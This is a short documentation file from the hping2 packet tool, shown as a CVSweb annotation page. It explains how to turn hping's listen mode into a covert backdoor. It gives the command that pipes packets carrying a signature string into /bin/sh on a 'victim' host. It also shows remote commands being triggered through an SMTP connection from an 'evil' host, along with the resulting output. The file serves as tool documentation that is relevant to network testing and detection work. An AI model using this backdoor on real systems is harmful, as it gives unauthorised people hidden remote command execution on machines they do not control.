Annotation of embedaddon/hping2/docs/AS-BACKDOOR, revision 1.1.1.1
1.1 misho 1: hping can be used as a backdoor. Just try the -9 (--listen) option
2: and put in pipe with /bin/sh:
3:
4: Put hping in listen mode in the victim host.
5:
6: victim# hping -I eth0 -9 mysign | /bin/sh
7:
8: Every packet that contain "mysign" will be processed by hping,
9: all the bytes that follows "mysign" in the packet will be dumped
10: to the standard output, so for example I'll able to exec commands
11: using all types of protocols. Just for example I can use the smtpd
12: to exec 'ls' in the victim.
13:
14: evil$ telnet victim 25
15:
16: Trying 192.168.1.1...
17: Connected to nano (192.168.1.1).
18: Escape character is '^]'.
19: 220 nano.marmoc.net ESMTP Sendmail
20: mysignls;
21:
22: on the victim you will see:
23:
24: victim# hping -I eth0 -9 mysign | /bin/sh
25: hping2 listen mode
26: bin cdrom etc home local-home mnt root tmp var
27: boot dev export lib lost+found proc sbin usr
28: : command not found
29:
30: As you can see I used 'ls;' since otherwise the shell will receive
31: just ls^M. The ";" force the command execution (at least with bash and zsh,
32: check your shell for more information).
33:
34: This works with all kind of valid not-filtered IP packets, the higher
35: level protocl does not matter.
36:
37: antirez <antirez@invece.org>
FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>
![[BACK]](/icons/cvsweb/back.gif){kind=icon}
Return to AS-BACKDOOR CVS log ![[TXT]](/icons/cvsweb/text.gif){kind=icon}
![[DIR]](/icons/cvsweb/dir.gif){kind=icon}
Up to [ELWIX - Embedded LightWeight unIX -] / embedaddon / hping2 / docs